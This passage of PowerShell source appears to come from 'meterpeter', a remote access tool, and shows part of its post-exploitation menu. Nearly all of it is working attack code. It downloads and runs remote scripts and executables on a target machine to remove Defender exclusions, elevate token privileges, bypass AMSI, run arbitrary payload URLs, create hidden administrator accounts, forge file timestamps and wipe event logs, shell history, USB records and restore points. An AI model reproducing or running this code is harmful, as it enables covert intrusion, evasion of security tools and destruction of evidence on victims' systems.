$ExcludePath -eq $null)\r\n           {\r\n              $ExcludePath = \"`$Env:TMP\"\r\n           }\r\n\r\n           #Execute command remote\r\n           write-host \" * Delete one Defender exclusion.`n`n\" -ForegroundColor Green\r\n           $Command = \"`$bool = (([System.Security.Principal.WindowsIdentity]::GetCurrent()).groups -match `\"S-1-5-32-544`\");If(`$bool){iwr -uri `\"https://raw.githubusercontent.com/r00t-3xp10it/redpill/main/lib/WD-Bypass/Invoke-Exclusions.ps1`\" -OutFile `\"`$Env:TMP\\Invoke-Exclusions.ps1`\";powershell -file `\"`$Env:TMP\\Invoke-Exclusions.ps1`\" -Action 'del' -Type `\"$ExcludeType`\" -Exclude `\"$ExcludePath`\";Remove-Item -Path `\"`$Env:TMP\\Invoke-Exclusions.ps1`\" -Force}Else{echo `\"   `> Error: administrator privileges required.`\" `> `$Env:TMP\\fddds.log;Get-Content -Path `\"`$Env:TMP\\fddds.log`\";Remove-Item -Path `\"`$Env:TMP\\fddds.log`\" -Force}\"\r\n        }\r\n        If($WD_choise -ieq \"Return\" -or $WD_choise -ieq \"cls\" -or $WD_choise -ieq \"Modules\" -or $WD_choise -ieq \"clear\")\r\n        {\r\n          $choise = $Null;\r\n          $Command = $Null;\r\n          $WD_choise = $Null;\r\n          $ExcludeType = $Null;\r\n          $ExcludePath = $Null;\r\n        }\r\n      }\r\n      If($choise -ieq \"Allprivs\")\r\n      {\r\n        write-host \"`n`n   Description:\" -ForegroundColor Yellow;\r\n        write-host \"   This function uses 'EnableAllParentPrivileges'\"\r\n        write-host \"   (by: @gtworek) to elevate shell token privileges.\"\r\n        write-host \"`n`n   Modules     Description                             Privileges Required\" -ForegroundColor green\r\n        write-host \"   -------     -----------                             -------------------\";\r\n        write-host \"   demo        Enable all token privileges (client)    \" -NoNewline\r\n        write-host \"Administrator\" -ForegroundColor Red;\r\n        write-host \"   cmdline     Execute 1 cmdline with full privileges  \" 
-NoNewline\r\n        write-host \"Administrator\" -ForegroundColor Red;\r\n        write-host \"   Return      Return to Server Main Menu\" -ForeGroundColor yellow;\r\n        write-host \"`n`n :meterpeter:Post:Allprivs> \" -NoNewline -ForeGroundColor Green;\r\n        $all_choise = Read-Host;\r\n        If($all_choise -ieq \"demo\")\r\n        {\r\n           #Execute command remote\r\n           $CmdlineToExecute = \"whoami /priv|Out-File myprivileges.log -Force\"\r\n           write-host \" * Elevating all process privileges (demo).\" -ForegroundColor Green\r\n           $Command = \"`$bool = (([System.Security.Principal.WindowsIdentity]::GetCurrent()).groups -match `\"S-1-5-32-544`\");If(`$bool){iwr -uri `\"https://raw.githubusercontent.com/r00t-3xp10it/redpill/main/utils/EnableAllParentPrivileges.exe`\" -OutFile `\"`$Env:TMP\\EnableAllParentPrivileges.exe`\"|Unblock-File;cd `$Env:TMP;.\\EnableAllParentPrivileges.exe;$CmdlineToExecute;Remove-Item -Path `\"`$Env:TMP\\EnableAllParentPrivileges.exe`\" -Force;Get-Content myprivileges.log;Remove-Item myprivileges.log -Force}Else{echo `\"   `> Error: administrator privileges required on remote`\" `> `$Env:TMP\\fddds.log;Get-Content -Path `\"`$Env:TMP\\fddds.log`\";Remove-Item -Path `\"`$Env:TMP\\fddds.log`\" -Force}\"\r\n        }\r\n        If($all_choise -ieq \"cmdline\")\r\n        {\r\n           write-host \" - cmdline to execute: \" -ForeGroundColor Red -NoNewline;\r\n           $CmdlineToExecute = Read-Host;\r\n           If(-not($CmdlineToExecute) -or $CmdlineToExecute -eq $null)\r\n           {\r\n              #Demonstration cmdline that executes whoami /priv and stores results on logfile to display on console terminal\r\n              $CmdlineToExecute = \"whoami /priv|Out-File myprivileges.log -Force;Start-Sleep -Seconds 1;Get-Content myprivileges.log;Remove-Item myprivileges.log -Force\"\r\n           }\r\n\r\n           #Execute command remote\r\n           write-host \" * Elevating all process 
privileges.\" -ForegroundColor Green\r\n           $Command = \"`$bool = (([System.Security.Principal.WindowsIdentity]::GetCurrent()).groups -match `\"S-1-5-32-544`\");If(`$bool){iwr -uri `\"https://raw.githubusercontent.com/r00t-3xp10it/redpill/main/utils/EnableAllParentPrivileges.exe`\" -OutFile `\"`$Env:TMP\\EnableAllParentPrivileges.exe`\"|Unblock-File;cd `$Env:TMP;.\\EnableAllParentPrivileges.exe;$CmdlineToExecute;Remove-Item -Path `\"`$Env:TMP\\EnableAllParentPrivileges.exe`\" -Force}Else{echo `\"   `> Error: administrator privileges required on remote`\" `> `$Env:TMP\\fddds.log;Get-Content -Path `\"`$Env:TMP\\fddds.log`\";Remove-Item -Path `\"`$Env:TMP\\fddds.log`\" -Force}\"\r\n        }\r\n        If($all_choise -ieq \"Return\" -or $all_choise -ieq \"cls\" -or $all_choise -ieq \"Modules\" -or $all_choise -ieq \"clear\")\r\n        {\r\n          $choise = $Null;\r\n          $Command = $Null;\r\n          $all_choise = $Null;\r\n        }\r\n      }\r\n      If($choise -ieq \"AMSIpatch\")\r\n      {\r\n        write-host \"`n`n   Description:\" -ForegroundColor Yellow;\r\n        write-host \"   This cmdlet attempts to disable AMS1 string scanning within\"\r\n        write-host \"   the current process context (terminal console) It also allow is\"\r\n        write-host \"   users to execute any inputed script trough AMS1 bypa`ss technic.\";\r\n        write-host \"`n`n   Modules     Description                            Privileges Required\" -ForegroundColor green;\r\n        write-host \"   -------     -----------                            -------------------\";\r\n        write-host \"   Console     Disable AMS1 within current process    UserLand\";\r\n        write-host \"   FilePath    Execute input script trough bypa`ss     UserLand\";\r\n        write-host \"   PayloadUrl  Download\\Execute script trough bypa`ss  UserLand\";\r\n        write-host \"   Return      Return to Server Main Menu\" -ForeGroundColor yellow;\r\n        write-host \"`n`n 
:meterpeter:Post:AMS`IPatch> \" -NoNewline -ForeGroundColor Green;\r\n        $Patch_choise = Read-Host;\r\n        If($Patch_choise -ieq \"Console\")\r\n        {\r\n           write-host \" * Disable AMS1 within current process`n\" -ForegroundColor Green\r\n           write-host \"`n   Technique  Description\" -ForegroundColor DarkYellow\r\n           write-host \"   ---------  -----------\"\r\n           write-host \"   2          FORC`E_AM`SI_ERROR\"\r\n           write-host \"   3          AM`SI_UT`ILS_P`AT`CH`n\"\r\n\r\n           write-host \" - Bypa`ss technique to use (2|3): \" -ForeGroundColor Red -NoNewline;\r\n           $Technic = Read-Host;\r\n           $Command = \"iwr -uri `\"https://raw.githubusercontent.com/r00t-3xp10it/redpill/main/bin/Invoke-Bypass.ps1`\" -OutFile `\"`$Env:TMP\\Invoke-Bypass.ps1`\"|Unblock-File;powershell -file `$Env:TMP\\Invoke-Bypass.ps1 -technic `\"$Technic`\" -Egg true\"\r\n        }\r\n        If($Patch_choise -ieq \"FilePath\")\r\n        {\r\n           write-host \" - Bypa`ss technique to use (2|3): \" -ForeGroundColor Red -NoNewline;\r\n           $Technic = Read-Host;\r\n           write-host \" - Execute script through byp`ass: \" -NoNewline;\r\n           $FilePath = Read-Host;\r\n           write-host \" - Exec script with args? 
(y|n) : \" -NoNewline;\r\n           $MArs = Read-Host;\r\n\r\n           If($MArs -iMatch '^(y|yes)$')\r\n           {\r\n              write-host \" - Input script arguments       : \" -ForeGroundColor Red -NoNewline;\r\n              $FileArgs = Read-Host;\r\n              $Command = \"iwr -uri `\"https://raw.githubusercontent.com/r00t-3xp10it/redpill/main/bypass/Invoke-Bypass.ps1`\" -OutFile `\"`$Env:TMP\\Invoke-Bypass.ps1`\"|Unblock-File;powershell -file `$Env:TMP\\Invoke-Bypass.ps1 -technic `\"$Technic`\" -filepath `\"$FilePath`\" -fileargs `\"$FileArgs`\";Remove-Item -Path `\"`$Env:TMP\\Invoke-Bypass.ps1`\" -Force\";\r\n           }\r\n           Else\r\n           {\r\n              $Command = \"iwr -uri `\"https://raw.githubusercontent.com/r00t-3xp10it/redpill/main/bypass/Invoke-Bypass.ps1`\" -OutFile `\"`$Env:TMP\\Invoke-Bypass.ps1`\"|Unblock-File;powershell -file `$Env:TMP\\Invoke-Bypass.ps1 -technic `\"$Technic`\" -filepath `\"$FilePath`\";Remove-Item -Path `\"`$Env:TMP\\Invoke-Bypass.ps1`\" -Force\"           \r\n           }\r\n        }\r\n        If($Patch_choise -ieq \"PayloadUrl\")\r\n        {\r\n           write-host \" - Byp`ass technic to use (2|3)  : \" -ForeGroundColor Red -NoNewline;\r\n           $Technic = Read-Host;\r\n           write-host \" - The Paylo`ad Url link         : \" -NoNewline;\r\n           $PayloadUrl = Read-Host;\r\n           write-host \" - Exec script with args? 
(y|n) : \" -NoNewline;\r\n           $MArs = Read-Host;\r\n\r\n           If($MArs -iMatch '^(y|yes)$')\r\n           {\r\n              write-host \" - Input script arguments       : \" -ForeGroundColor Red -NoNewline;\r\n              $FileArgs = Read-Host;\r\n              $Command = \"iwr -uri `\"https://raw.githubusercontent.com/r00t-3xp10it/redpill/main/bypass/Invoke-Bypass.ps1`\" -OutFile `\"`$Env:TMP\\Invoke-Bypass.ps1`\"|Unblock-File;powershell -file `$Env:TMP\\Invoke-Bypass.ps1 -technic `\"$Technic`\" -Payloadurl `\"$PayloadUrl`\" -fileargs `\"$FileArgs`\";Remove-Item -Path `\"`$Env:TMP\\Invoke-Bypass.ps1`\" -Force\";\r\n           }\r\n           Else\r\n           {\r\n              $Command = \"iwr -uri `\"https://raw.githubusercontent.com/r00t-3xp10it/redpill/main/bypass/Invoke-Bypass.ps1`\" -OutFile `\"`$Env:TMP\\Invoke-Bypass.ps1`\"|Unblock-File;powershell -file `$Env:TMP\\Invoke-Bypass.ps1 -technic `\"$Technic`\" -payloadurl `\"$PayloadUrl`\";Remove-Item -Path `\"`$Env:TMP\\Invoke-Bypass.ps1`\" -Force\";\r\n           }\r\n        }\r\n        If($Patch_choise -ieq \"Return\" -or $Patch_choise -ieq \"cls\" -or $Patch_choise -ieq \"Modules\" -or $Patch_choise -ieq \"clear\")\r\n        {\r\n          $choise = $Null;\r\n          $Command = $Null;\r\n          $Patch_choise = $Null;\r\n        }\r\n      }\r\n      If($choise -ieq \"FindEop\" -or $choise -ieq \"EOP\")\r\n      {\r\n        write-host \"`n`n   Remark:\" -ForegroundColor Yellow;\r\n        write-host \"   None of the modules in this sub-category will try to exp`loit any\";\r\n        write-host \"   weak permissions found. 
They will only report the vulnerability.\";\r\n        write-host \"   Aggressive scans take 3 to 8 minutes depending on the scan selected.\" -ForeGroundColor DarkYellow\r\n        write-host \"`n`n   Modules   Description                       Privileges Required\" -ForegroundColor green;\r\n        write-host \"   -------   -----------                       -------------------\";\r\n        write-host \"   Check     Retrieve directory permissions    UserLand\";\r\n        write-host \"   Service   Search for unquoted service paths UserLand\";\r\n        write-host \"   RottenP   Search for rotten potato vuln     UserLand\";\r\n        write-host \"   Agressive Search all EOP possible entries   UserLand\";\r\n        write-host \"   Return    Return to Server Main Menu\" -ForeGroundColor yellow;\r\n        write-host \"`n`n :meterpeter:Post:Eop> \" -NoNewline -ForeGroundColor Green;\r\n        $my_choise = Read-Host;\r\n        If($my_choise -ieq \"Agressive\")\r\n        {\r\n           write-host \" - Use aggressive reports? 
(y|n): \"  -NoNewline;\r\n           $VerOut = Read-Host;\r\n           Write-Host \" * Search for ALL EOP possible entrys.\" -ForegroundColor Green;Start-Sleep -Seconds 1;\r\n           If($VerOut -iMatch '^(y|yes)$')\r\n           {\r\n              Write-Host \"   => Remark: Module takes aprox 8 minuts to finish ..\" -ForegroundColor Yellow;write-host \"`n\";\r\n              $Command = \"iwr -Uri https://raw.githubusercontent.com/r00t-3xp10it/meterpeter/master/mimiRatz/FindEop.ps1 -OutFile FindEOP.ps1;powershell -file FindEOP.ps1 -verb true;Remove-Item -Path FindEOP.ps1 -Force\"\r\n           }\r\n           Else\r\n           {\r\n              Write-Host \"   => Remark: Module takes aprox 3 minuts to finish ..\" -ForegroundColor Yellow;write-host \"`n\";\r\n              $Command = \"iwr -Uri https://raw.githubusercontent.com/r00t-3xp10it/meterpeter/master/mimiRatz/FindEop.ps1 -OutFile `$Env:TMP\\FindEOP.ps1;powershell -File `$Env:TMP\\FindEOP.ps1;Remove-Item -Path `\"`$Env:TMP\\FindEOP.ps1`\" -Force\"\r\n           }\r\n        }\r\n        If($my_choise -ieq \"Check\" -or $my_choise -ieq \"check\")\r\n        {\r\n          write-host \" - Input Remote Folder Path (`$Env:TMP): \" -NoNewline\r\n          $RfPath = Read-Host\r\n\r\n          write-host \" * Enumerate folder permissions (icacls).\" -ForegroundColor Green\r\n          If(-not($RfPath))\r\n          {\r\n             $RfPath = \"$Env:TMP\"\r\n             write-host \"   => Error: wrong input, default to: $RfPath\" -ForegroundColor Red\r\n             Start-Sleep -Milliseconds 700\r\n          }\r\n\r\n          write-host \"\"\r\n          $Command = \"icacls `\"$RfPath`\" `> dellog.txt;Get-Content dellog.txt;remove-item dellog.txt -Force\";\r\n        }\r\n        If($my_choise -ieq \"Service\" -or $my_choise -ieq \"service\")\r\n        {\r\n          write-host \" * Enumerate unquoted service paths.`n\" -ForegroundColor Green;\r\n          $Command = \"gwmi -class Win32_Service -Property 
Name,PathName,StartMode|Where-Object{`$_.StartMode -eq `\"Auto`\" -and `$_.PathName -notlike `\"C:\\Windows*`\" -and `$_.PathName -NotMatch '`\"'}|Select-Object Name,PathName `> WeakFP.txt;Get-Content WeakFP.txt;remove-item WeakFP.txt -Force\";\r\n        }\r\n        If($my_choise -ieq \"RottenP\" -or $my_choise -ieq \"rotten\")\r\n        {\r\n          $myLine = \"SeIm\" + \"person\" + \"atePriv\" + \"ilege\" -join ''\r\n          $DebugPriv = \"SeD\" + \"ebugPriv\" + \"ileges\" -join ''\r\n          write-host \" * Searching rotten potato vuln settings.`n\" -ForegroundColor Green\r\n          $Command = \"`$bool = (([System.Security.Principal.WindowsIdentity]::GetCurrent()).groups -match `\"S-1-5-32-544`\");If(`$bool){echo `\"   `> Error: this module cant not run with admin Privileges`\" `> dellog.txt;Get-Content dellog.txt;Remove-Item dellog.txt -Force}else{cmd /R whoami /priv|findstr /i /C:`\"$myLine`\" /C:`\"SeAssignPrimaryPrivilege`\" /C:`\"SeTcbPrivilege`\" /C:`\"SeBackupPrivilege`\" /C:`\"SeRestorePrivilege`\" /C:`\"SeCreateTokenPrivilege`\" /C:`\"SeLoadDriverPrivilege`\" /C:`\"SeTakeOwnershipPrivilege`\" /C:`\"$DebugPriv`\" `> dellog.txt;`$check_ACL = get-content dellog.txt|findstr /i /C:`\"Enabled`\";If(`$check_ACL){echo `\"   Rotten Potato Vulnerable Settings Found [Enabled] ..`\" `> test.txt;Get-Content test.txt;Remove-Item test.txt -Force;Get-Content dellog.txt;remove-item dellog.txt -Force}else{echo `\"   `> Error: none weak permissions found [ Rotten Potato ] ..`\" `> test.txt;Get-Content test.txt;Remove-Item test.txt -Force;Remove-Item dellog.txt -Force}}\";\r\n       }\r\n        If($my_choise -ieq \"Return\" -or $my_choise -ieq \"return\" -or $my_choise -ieq \"cls\" -or $my_choise -ieq \"Modules\" -or $my_choise -ieq \"modules\" -or $my_choise -ieq \"clear\")\r\n        {\r\n          $RfPath = $Null;\r\n          $Command = $Null;\r\n          $my_choise = $Null;\r\n          $Group_Attr = $Null;\r\n        }\r\n      }\r\n      If($choise -ieq 
\"HideUser\")\r\n      {\r\n         write-host \"`n`n   Description:\" -ForegroundColor Yellow\r\n         write-host \"   This module query, create or delete windows hidden accounts.\"\r\n         write-host \"   It also allow to set the account 'Visible' or 'Hidden' state.\"\r\n         write-host \"   Warning: Create account requires 'LanmanWorkstation' service running\" -ForegroundColor Yellow\r\n         write-host \"   or else the account created will not inherit admin privileges token.\" -ForegroundColor Yellow\r\n         write-host \"   Manual check: :meterpeter> Get-Service LanmanWorkstation\" -ForegroundColor Blue\r\n         write-host \"`n`n   Modules  Description                  Privileges Required\" -ForegroundColor green;\r\n         write-host \"   -------  -----------                  ------------------\";\r\n         write-host \"   Query    Query all accounts           UserLand\";\r\n         write-host \"   Create   Create hidden account        \" -NoNewline\r\n         write-host \"Administrator\" -ForegroundColor Red;\r\n         write-host \"   Delete   Delete hidden account        \" -NoNewline\r\n         write-host \"Administrator\" -ForegroundColor Red;\r\n         write-host \"   Return   Return to Server Main Menu\" -ForeGroundColor yellow\r\n         write-host \"`n`n :meterpeter:Post:HideUser> \" -NoNewline -ForeGroundColor Green;\r\n         $AccManager_choise = Read-Host;\r\n         If($AccManager_choise -ieq \"Query\")\r\n         {\r\n            Write-Host \" * Enumerating user accounts.\" -ForegroundColor Green\r\n            $Command = \"iwr -Uri `\"https://raw.githubusercontent.com/r00t-3xp10it/redpill/main/bin/HiddenUser.ps1`\" -OutFile `\"`$Env:TMP\\HiddenUser.ps1`\"|Out-Null;powershell -WindowStyle hidden -File `$Env:TMP\\HiddenUser.ps1 -Action Query;Remove-Item -Path `$Env:TMP\\HiddenUser.ps1 -Force\"\r\n         }\r\n         If($AccManager_choise -ieq \"Create\")\r\n         {\r\n            Write-Host \" - Input 
account name:\" -ForeGroundColor Red -NoNewline\r\n            $AccountName = Read-Host\r\n            Write-Host \" - Input account pass:\" -ForeGroundColor Red -NoNewline\r\n            $password = Read-Host\r\n            Write-Host \" - Account State (hidden|visible):\" -ForeGroundColor Red -NoNewline\r\n            $AccountState = Read-Host\r\n            Write-Host \" * Create new user account\" -ForegroundColor Green\r\n            If(-not($AccountState) -or $AccountState -ieq $null){$AccountState = \"hidden\"}Else{$AccountState = \"visible\"}\r\n            $Command = \"`$bool = (([System.Security.Principal.WindowsIdentity]::GetCurrent()).groups -match `\"S-1-5-32-544`\");If(`$bool){iwr -Uri `\"https://raw.githubusercontent.com/r00t-3xp10it/redpill/main/bin/HiddenUser.ps1`\" -OutFile `\"`$Env:TMP\\HiddenUser.ps1`\"|Out-Null;powershell -WindowStyle hidden -File `$Env:TMP\\HiddenUser.ps1 -Action Create -UserName $AccountName -Password $password -State $AccountState;Remove-Item -Path `$Env:TMP\\HiddenUser.ps1 -Force}Else{echo `\"`\";echo `\"    `> Error: Administrator privileges required!`\"|Out-File `$Env:TMP\\hidenUser.meterpeter;Get-Content -Path `$Env:TMP\\hidenUser.meterpeter;Remove-Item -Path `$Env:TMP\\hidenUser.meterpeter -Force}\"\r\n         }\r\n         If($AccManager_choise -ieq \"Delete\")\r\n         {\r\n            Write-Host \" - Input account name: \" -NoNewline -ForegroundColor Red;\r\n            $AccountName = Read-Host;Write-Host \" * Delete '$AccountName' user account\" -ForegroundColor Green\r\n            $Command = \"`$bool = (([System.Security.Principal.WindowsIdentity]::GetCurrent()).groups -match `\"S-1-5-32-544`\");If(`$bool){iwr -Uri `\"https://raw.githubusercontent.com/r00t-3xp10it/redpill/main/bin/HiddenUser.ps1`\" -OutFile `\"`$Env:TMP\\HiddenUser.ps1`\"|Out-Null;powershell -WindowStyle hidden -File `$Env:TMP\\HiddenUser.ps1 -Action Delete -UserName $AccountName;Remove-Item -Path `$Env:TMP\\HiddenUser.ps1 -Force}Else{echo `\" 
   `> Error: Administrator privileges required!`\"|Out-File `$Env:TMP\\hidenUser.meterpeter;Get-Content -Path `$Env:TMP\\hidenUser.meterpeter;Remove-Item -Path `$Env:TMP\\hidenUser.meterpeter -Force}\"\r\n         }\r\n         If($AccManager_choise -ieq \"Return\" -or $AccManager_choise -ieq \"cls\" -or $AccManager_choise -ieq \"modules\" -or $AccManager_choise -ieq \"clear\")\r\n         {\r\n            $choise = $Null;\r\n            $Command = $Null;\r\n            $AccManager_choise = $Null;\r\n         }\r\n      }\r\n      If($choise -ieq \"TimeStamp\" -or $choise -ieq \"mace\")\r\n      {\r\n         write-host \"`n`n   Description:\" -ForegroundColor Yellow\r\n         write-host \"   This module modifies the selected file's MACE properties:\"\r\n         write-host \"   CreationTime, LastAccessTime and LastWriteTime ..\" -ForegroundColor DarkYellow\r\n         write-host \"`n`n   Modules  Description                  Privileges Required\" -ForegroundColor green;\r\n         write-host \"   -------  -----------                  ------------------\";\r\n         write-host \"   Check    existing file timestamp      UserLand\";\r\n         write-host \"   Modify   existing file timestamp      UserLand\";\r\n         write-host \"   Return   Return to Server Main Menu\" -ForeGroundColor yellow\r\n         write-host \"`n`n :meterpeter:Post:Mace> \" -NoNewline -ForeGroundColor Green;\r\n         $timestamp_choise = Read-Host;\r\n         If($timestamp_choise -ieq \"check\")\r\n         {\r\n            Write-Host \" - File\\Folder absolute path: \" -ForeGroundColor Red -NoNewline\r\n            $FileMace = Read-Host\r\n            If([string]::IsNullOrEmpty($FileMace))\r\n            {\r\n               $FileMace = \"`$pwd\"\r\n               write-host \"   => Error: wrong input, default to $FileMace\" -ForegroundColor Red\r\n               Start-Sleep -Milliseconds 700\r\n            }\r\n\r\n            Write-Host \" * Print $FileMace timestamp(s)\" 
-ForegroundColor Green\r\n            $Command = \"If(-not(Test-Path -Path `\"$FileMace`\" -EA SilentlyContinue)){echo `\"`n    NotFound: $FileMace`\"}Else{Get-ChildItem -Path `\"$FileMace`\"|Select-Object @{Name='State';Expression={'Current timestamp'}},Attributes,Name,Directory,CreationTime,LastAccessTime,LastWriteTime}\"\r\n         }\r\n         If($timestamp_choise -ieq \"Modify\")\r\n         {\r\n            Write-Host \" - The file to modify absolute path: \" -ForeGroundColor Red -NoNewline\r\n            $FileMace = Read-Host\r\n            Write-Host \" - The Date (08 March 1999 19:19:19): \" -NoNewline\r\n            $DateMace = Read-Host\r\n            If(-not($DateMace) -or $DateMace -eq $null)\r\n            {\r\n               $DateMace = \"08 March 1999 19:19:19\"\r\n               write-host \"   => Error: wrong input, default to $DateMace\" -ForeGroundColor red                  \r\n            }\r\n\r\n            Write-Host \" * Modify selected file timestamp\" -ForegroundColor Green\r\n            $Command = \"iwr -Uri `\"https://raw.githubusercontent.com/r00t-3xp10it/redpill/main/bin/FileMace.ps1`\" -OutFile `\"`$Env:TMP\\FileMace.ps1`\"|Out-Null;powershell -WindowStyle hidden -file `$Env:TMP\\FileMace.ps1 -FileMace `\"$FileMace`\" -Date `\"$DateMace`\";Start-Sleep -Seconds 4;Remove-Item -Path `\"`$Env:TMP\\FileMace.ps1`\" -Force\"\r\n         }\r\n         If($timestamp_choise -ieq \"Return\" -or $timestamp_choise -ieq \"cls\" -or $timestamp_choise -ieq \"modules\" -or $timestamp_choise -ieq \"clear\")\r\n         {\r\n            $choise = $Null;\r\n            $Command = $Null;\r\n            $timestamp_choise = $Null;\r\n         }\r\n      }\r\n      If($choise -ieq \"Artifacts\")\r\n      {\r\n         write-host \"`n`n   Description:\" -ForegroundColor Yellow\r\n         write-host \"   This module deletes attacker activity (artifacts) on the target system by\"\r\n         write-host \"   deleting .tmp, .log, .ps1 from %tmp% and eventvwr 
logfiles from snapin\"\r\n         write-host \"   Remark: Administrator privs required to clean eventvwr + Restore Points\" -ForegroundColor Yellow\r\n         write-host \"`n`n   Modules  Description                  Privileges Required\" -ForegroundColor green;\r\n         write-host \"   -------  -----------                  ------------------\";\r\n         write-host \"   Query    query eventvwr logs          UserLand\"\r\n         write-host \"   Clean    clean system tracks          UserLand\\\" -NoNewline\r\n         write-host \"Administrator\" -ForegroundColor Red;\r\n         write-host \"   Paranoid clean tracks paranoid        UserLand\\\" -NoNewline\r\n         write-host \"Administrator\" -ForegroundColor Red;\r\n         write-host \"   Return   Return to Server Main Menu\" -ForeGroundColor yellow\r\n         write-host \"`n`n :meterpeter:Post:Artifacts> \" -NoNewline -ForeGroundColor Green;\r\n         $track_choise = Read-Host;\r\n         If($track_choise -ieq \"Query\")\r\n         {\r\n            Write-Host \" * Query main eventvwr logs\" -ForegroundColor Green\r\n            $Command = \"Get-WinEvent -ListLog * -ErrorAction Ignore|Where-Object { `$_.LogName -iMatch '(AMS`I|UAC|`^Application`$|DeviceGuard/Operational`$|Regsvr32/Operational`$|Windows Defender|WMI-Activity/Operational`$|AppLocker/Exe and DLL`$|AppLocker/MSI and Script`$|`^windows powershell`$|`^Microsoft-Windows-PowerShell/Operational`$|Bits-Client/Operational`$|TCPIP)' -and `$_.LogName -iNotMatch '(/Admin)$'}|Format-Table -AutoSize `> Event.txt;Get-content Event.txt;Remove-Item Event.txt -Force\";\r\n         }\r\n         If($track_choise -ieq \"clean\")\r\n         {\r\n            Write-Host \" * Cleanning remote system tracks ..`n\" -ForegroundColor Green;\r\n            $MeterClient = \"$payload_name\" + \".ps1\" -Join ''\r\n            $Command = \"echo `\"[*] Cleaning Temporary folder artifacts ..`\" `> `$Env:TMP\\clean.meterpeter;Remove-Item -Path `\"`$Env:TMP\\*`\" 
-Include *.exe,*.bat,*.vbs,*.tmp,*.log,*.ps1,*.dll,*.lnk,*.inf,*.png,*.zip -Exclude *$MeterClient* -EA SilentlyContinue -Force -Recurse;echo `\"[*] Cleaning Recent directory artifacts ..`\" `>`> `$Env:TMP\\clean.meterpeter;Remove-Item -Path `\"`$Env:APPDATA\\Microsoft\\Windows\\Recent\\*`\" -Include *.exe,*.bat,*.vbs,*.log,*.ps1,*.dll,*.inf,*.lnk,*.png,*.txt,*.zip -Exclude desktop.ini -EA SilentlyContinue -Force -Recurse;echo `\"[*] Cleaning Recent documents artifacts ..`\" `>`> `$Env:TMP\\clean.meterpeter;cmd /R REG DELETE `\"HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\RecentDocs`\" /f|Out-Null;cmd /R REG ADD `\"HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\RecentDocs`\" /ve /t REG_SZ /f|Out-Null;echo `\"[*] Cleaning DNS Resolver cache artifacts ..`\" `>`> `$Env:TMP\\clean.meterpeter;cmd /R ipconfig /flushdns|Out-Null;If(Get-Command `\"Clear-RecycleBin`\" -EA SilentlyContinue){echo `\"[*] Cleaning recycle bin folder artifacts ..`\" `>`> `$Env:TMP\\clean.meterpeter;Start-Process -WindowStyle Hidden powershell -ArgumentList `\"Clear-RecycleBin -Force`\" -Wait}Else{echo `\"[*] Cleaning recycle bin folder artifacts ..`\" `>`> `$Env:TMP\\clean.meterpeter;echo `\"   `> Error: 'Clear-RecycleBin' not found ..`\" `>`> `$Env:TMP\\clean.meterpeter};echo `\"[*] Cleaning ConsoleHost_history artifacts ..`\" `>`> `$Env:TMP\\clean.meterpeter;`$CleanPSLogging = (Get-PSReadlineOption -EA SilentlyContinue).HistorySavePath;echo `\"MeterPeterNullArtifacts`\" `> `$CleanPSLogging;`$bool = (([System.Security.Principal.WindowsIdentity]::GetCurrent()).groups -match `\"S-1-5-32-544`\");If(`$bool){echo `\"[*] Cleaning Cache of plugged USB devices ..`\" `>`> `$Env:TMP\\clean.meterpeter;cmd /R REG DELETE `\"HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Enum\\USBSTOR`\" /f|Out-Null;cmd /R REG ADD `\"HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Enum\\USBSTOR`\" /ve /t REG_SZ /f|Out-Null;echo `\"[-] Cleaning Eventvwr logfiles from 
snapin ..`\" `>`> `$Env:TMP\\clean.meterpeter;`$PSlist = wevtutil el | Where-Object {`$_ -iMatch '(AM`SI/Debug|UAC|Powershell|BITS|Windows Defender|WMI-Activity/Operational|AppLocker/Exe and DLL|AppLocker/MSI and Script|TCPIP/Operational)' -and `$_ -iNotMatch '(/Admin)`$'};ForEach(`$PSCategorie in `$PSlist){wevtutil cl `\"`$PSCategorie`\"|Out-Null;echo `\"    deleted: `$PSCategorie`\" `>`> `$Env:TMP\\clean.meterpeter}}Else{echo `\"[x] Cleaning Eventvwr logfiles from snapin ..`\" `>`> `$Env:TMP\\clean.meterpeter;echo `\"    => Error: Administrator privileges required!`\" `>`> `$Env:TMP\\clean.meterpeter};Get-Content -Path `$Env:TMP\\clean.meterpeter;Remove-Item -Path `$Env:TMP\\clean.meterpeter -Force\"\r\n         }\r\n         If($track_choise -ieq \"Paranoid\") \r\n         {\r\n            Write-Host \" - Display verbose outputs? (y|n): \" -NoNewline\r\n            $StDoutStatus = Read-Host\r\n            If($StDoutStatus -iMatch '^(y|yes|true)$'){$stdout = \"True\"}Else{$stdout = \"False\"}\r\n            Write-Host \" - Delete Restore Points? 
(y|n)  : \" -ForeGroundColor Red -NoNewline\r\n            $RPointsStatus = Read-Host;If($RPointsStatus -iMatch '^(y|yes|true)$'){$RStdout = \"True\"}Else{$RStdout = \"False\"}\r\n            Write-Host \" * Cleanning system tracks.\" -ForegroundColor Green\r\n            $Command = \"iwr -Uri `\"https://raw.githubusercontent.com/r00t-3xp10it/redpill/main/bin/CleanTracks.ps1`\" -OutFile `\"`$Env:TMP\\CleanTracks.ps1`\"|Out-Null;powershell -File `$Env:TMP\\CleanTracks.ps1 -CleanTracks Paranoid -Verb $stdout -DelRestore $RStdout;Remove-Item -Path `$Env:TMP\\CleanTracks.ps1 -EA SilentlyContinue -Force\"\r\n         }\r\n         If($track_choise -ieq \"Return\" -or $track_choise -ieq \"cls\" -or $track_choise -ieq \"modules\" -or $track_choise -ieq \"clear\")\r\n         {\r\n            $choise = $Null;\r\n            $Command = $Null;\r\n            $track_choise = $Null;\r\n         }\r\n      }\r\n      If($choise -ieq \"Stream\")\r\n      {\r\n         write-host \"`n`n   Requirements:\" -ForegroundColor Yellow\r\n         write-host \"   Mozilla firefox browser which supports MJPEG installed on attacker.\"\r\n         write-host \"   Streams target desktop live untill 'execution' setting its reached.\"\r\n         write-host \"   Remark: 30 seconds its the minimum accepted execution timer input.\" -ForegroundColor Yellow\r\n         write-host \"`n`n   Modules  Description                  Privileges Required\" -ForegroundColor green;\r\n         write-host \"   -------  -----------                  ------------------\";\r\n         write-host \"   Start    Stream target desktop        UserLand\";\r\n         write-host \"   Return   Return to Server Main Menu\" -ForeGroundColor yellow\r\n         write-host \"`n`n :meterpeter:Post:Stream> \" -NoNewline -ForeGroundColor Green;\r\n         $Stream_choise = Read-Host;\r\n         